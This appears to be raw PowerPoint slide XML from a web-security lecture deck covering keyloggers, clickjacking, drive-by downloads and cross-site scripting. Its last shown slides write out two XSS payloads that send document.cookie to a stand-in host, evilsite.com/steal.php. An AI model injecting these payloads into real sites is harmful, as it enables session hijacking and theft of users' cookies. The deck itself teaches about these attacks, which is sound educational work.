            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Hardware or software that records all keystrokes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>May be a small dongle plugged into a USB port or can masquerade as a keyboard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>May also be installed as malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Not limited to browsers</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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14373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Page-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>User is directed to a different page than believed or intended</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Similar effect to a man-in-the-browser, where attacker can intercept and modify user input</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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2036257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Download Substitution</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3982" dirty="0"/>
              <a:t>Attacker creates a page with seemingly innocuous and desirable programs for download</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3982" dirty="0"/>
              <a:t>Instead of, or in addition to, the intended functionality, the user installs malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3982" dirty="0"/>
              <a:t>This is a very common technique for spyware</a:t>
            </a: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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="108462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User-in-the-Middle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="fig04-04.tif"/>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38" r="38263"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="401383" y="3030439"/>
            <a:ext cx="5781747" cy="5325706"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12202174" y="9359900"/>
            <a:ext cx="282130" cy="276999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5BFA158B-7C94-F543-87DB-41F59EA4FAFA}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using click-bait to trick users into solving CAPTCHAs on spammers’ behalf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140857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Successful Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Content Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3982" dirty="0"/>
              <a:t>The attacks listed above are largely failures of authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3982" dirty="0"/>
              <a:t>Can be mitigated with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3413" dirty="0"/>
              <a:t>Shared secret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3413" dirty="0"/>
              <a:t>One-time password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3413" dirty="0"/>
              <a:t>Out-of-band communication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27121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Website</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-07.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81" b="1302"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1820794" y="2216041"/>
            <a:ext cx="9328691" cy="6842395"/>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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="67265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fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hypertext markup language (HTML)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Describes the content and formatting of Webpages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Rendered within browser window </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML features</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Static document description language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Supports linking to other pages and embedding images by reference </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>User input sent to server via forms </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML extensions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Additional media content (e.g., PDF, video) supported through plugins </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Embedding programs in supported languages (e.g., JavaScript, Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) provides dynamic content that interacts with the user, modifies the browser user interface, and can access the client computer environment </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1634898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Code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-08.tif"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-160" b="-2247"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2142576" y="2071956"/>
            <a:ext cx="8678976" cy="7022592"/>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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1296081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Bug</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-12.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30" b="-669"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2710218" y="2277362"/>
            <a:ext cx="7579489" cy="6821871"/>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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352502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Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="fig04-13.eps"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect t="-3075" b="-8587"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2476756" y="1912467"/>
            <a:ext cx="8041825" cy="7588399"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1330736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Drive-By Download</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Code is downloaded, installed, and executed on a computer without the user’s knowledge</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May be the result of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, fake code, program download </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>subsitution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, etc.</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="fig04-14.t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94" y="5958304"/>
            <a:ext cx="12099564" cy="1819069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33262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Site Scripting (XSS) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attacker injects scripting code into pages generated </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by a web application </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Script could be malicious code</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– JavaScript (AJAX!), VBScript, ActiveX, HTML, or Flash </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Threats: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Phishing, hijacking, changing of user settings, cookie theft/poisoning, false advertising , execution of code on the client, ...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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1827693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Example </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="894080" y="2596444"/>
            <a:ext cx="5668952" cy="6188570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Website allows posting of comments in a guestbook </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Server incorporates comments into page returned </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;title&gt;My Guestbook!&lt;/title&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Thanks for signing my guestbook!&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> /&gt; Here's what everyone else had to say:&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> /&gt; Joe: Hi! &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>John: Hello, how are you? &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> /&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Jane: How does this guestbook work? &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> /&gt; &lt;/body&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Attacker can post comment that includes malicious JavaScript </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Evilguy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>: &lt;script&gt;alert("XSS Injection!"); &lt;/script&gt; &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>br</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> /&gt;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0359" y="2596444"/>
            <a:ext cx="5682941" cy="5938575"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="446433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 Stealing XSS Attacks </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> = "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.evilsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>steal.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>; &lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>• Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="444500" lvl="1" indent="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = new Image();</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>img.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> = "http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>www.evilsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>steal.php?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
